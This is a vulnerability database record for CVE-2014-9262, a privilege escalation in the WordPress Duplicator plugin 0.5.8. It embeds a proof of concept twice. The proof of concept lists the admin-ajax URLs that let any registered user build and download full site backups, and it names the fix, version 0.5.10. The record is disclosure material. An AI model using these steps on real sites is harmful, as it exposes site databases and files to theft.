ID WPVDB-ID:7799
Type wpvulndb
Reporter Kacper Szurek
Modified 2015-05-15T00:00:00
Description
WordPress Vulnerability - Duplicator 0.5.8 - Privilege Escalation
{"id": "WPVDB-ID:7799", "hash": "211d4c4387fa163cb2460f08fc062082", "type": "wpvulndb", "bulletinFamily": "software", "title": "Duplicator 0.5.8 - Privilege Escalation", "description": "WordPress Vulnerability - Duplicator 0.5.8 - Privilege Escalation\n", "published": "2015-02-19T00:00:00", "modified": "2015-05-15T00:00:00", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "href": "https://wpvulndb.com/vulnerabilities/7799", "reporter": "Kacper Szurek", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9262", "http://packetstormsecurity.com/files/130439/", "http://security.szurek.pl/duplicator-058-privilege-escalation.html"], "cvelist": ["CVE-2014-9262"], "lastseen": "2018-09-17T19:26:27", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE", "modified": "2018-09-17T19:26:27"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-9262"]}, {"type": "zdt", "idList": ["1337DAY-ID-23304"]}, {"type": "exploitdb", "idList": ["EDB-ID:36112"]}], "modified": "2018-09-17T19:26:27"}, "vulnersScore": 9.3}, "objectVersion": "1.4", "affectedSoftware": [{"name": "duplicator", "version": "0.5.10", "operator": "lt"}], "_object_type": "robots.models.wpvulndb.WPVulnDBBulletin", "_object_types": ["robots.models.wpvulndb.WPVulnDBBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2017-08-16T10:43:18", "bulletinFamily": "NVD", "description": "The Duplicator plugin in Wordpress before 0.5.10 allows remote authenticated users to create and download backup files.", "modified": "2017-08-15T12:48:25", "published": "2017-08-07T13:29:00", "id": "CVE-2014-9262", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9262", "type": "cve", "title": "CVE-2014-9262", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}}], "exploitdb": [{"lastseen": "2016-02-04T02:46:40", "bulletinFamily": "exploit", "description": "Duplicator 0.5.8 - Privilege Escalation. CVE-2014-9262. Webapps exploit for php platform", "modified": "2015-02-18T00:00:00", "published": "2015-02-18T00:00:00", "id": "EDB-ID:36112", "href": "https://www.exploit-db.com/exploits/36112/", "type": "exploitdb", "title": "Duplicator 0.5.8 - Privilege Escalation", "sourceData": "# Exploit Title: Duplicator 0.5.8 Privilege Escalation\r\n# Date: 21-11-2014\r\n# Software Link: https://wordpress.org/plugins/duplicator/\r\n# Exploit Author: Kacper Szurek\r\n# Contact: http://twitter.com/KacperSzurek\r\n# Website: http://security.szurek.pl/\r\n# Category: webapps\r\n\r\n1. Description\r\n \r\nEvery registered user can create and download backup files.\r\n\r\nFile: duplicator\\duplicator.php\r\nadd_action('wp_ajax_duplicator_package_scan',\t\t'duplicator_package_scan');\r\nadd_action('wp_ajax_duplicator_package_build',\t\t'duplicator_package_build');\r\nadd_action('wp_ajax_duplicator_package_delete',\t\t'duplicator_package_delete');\r\nadd_action('wp_ajax_duplicator_package_report',\t\t'duplicator_package_report');\r\n\r\nhttp://security.szurek.pl/duplicator-058-privilege-escalation.html\r\n\r\n2. Proof of Concept\r\n\r\nLogin as regular user (created using wp-login.php?action=register) then start scan:\r\n\r\nhttp://wordpress-url/wp-admin/admin-ajax.php?action=duplicator_package_scan\r\n\r\nAfter that you can build backup:\r\n\r\nhttp://wordpress-url/wp-admin/admin-ajax.php?action=duplicator_package_build\r\n\r\nThis function will return json with backup name inside File key.\r\n\r\nYou can download backup using:\r\n\r\nhttp://wordpress-url/wp-snapshots/%file_name_from_json%\r\n\r\n3. Solution:\r\n \r\nUpdate to version 0.5.10", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/36112/"}], "zdt": [{"lastseen": "2018-01-04T07:08:26", "bulletinFamily": "exploit", "description": "WordPress Duplicator plugin version 0.5.8 suffers from a backup related vulnerability that allows for privilege escalation.", "modified": "2015-02-18T00:00:00", "published": "2015-02-18T00:00:00", "id": "1337DAY-ID-23304", "href": "https://0day.today/exploit/description/23304", "type": "zdt", "title": "WordPress Duplicator 0.5.8 Privilege Escalation Vulnerability", "sourceData": "# Exploit Title: Duplicator 0.5.8 Privilege Escalation\r\n# Date: 21-11-2014\r\n# Software Link: https://wordpress.org/plugins/duplicator/\r\n# Exploit Author: Kacper Szurek\r\n# Contact: http://twitter.com/KacperSzurek\r\n# Website: http://security.szurek.pl/\r\n# Category: webapps\r\n# CVE: CVE-2014-9262\r\n\r\n1. Description\r\n \r\nEvery registered user can create and download backup files.\r\n\r\nFile: duplicator\\duplicator.php\r\nadd_action('wp_ajax_duplicator_package_scan',\t\t'duplicator_package_scan');\r\nadd_action('wp_ajax_duplicator_package_build',\t\t'duplicator_package_build');\r\nadd_action('wp_ajax_duplicator_package_delete',\t\t'duplicator_package_delete');\r\nadd_action('wp_ajax_duplicator_package_report',\t\t'duplicator_package_report');\r\n\r\nhttp://security.szurek.pl/duplicator-058-privilege-escalation.html\r\n\r\n2. Proof of Concept\r\n\r\nLogin as regular user (created using wp-login.php?action=register) then start scan:\r\n\r\nhttp://wordpress-url/wp-admin/admin-ajax.php?action=duplicator_package_scan\r\n\r\nAfter that you can build backup:\r\n\r\nhttp://wordpress-url/wp-admin/admin-ajax.php?action=duplicator_package_build\r\n\r\nThis function will return json with backup name inside File key.\r\n\r\nYou can download backup using:\r\n\r\nhttp://wordpress-url/wp-snapshots/%file_name_from_json%\r\n\r\n3. Solution:\r\n \r\nUpdate to version 0.5.10\n\n# 0day.today [2018-01-04] #", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "sourceHref": "https://0day.today/exploit/23304"}]}
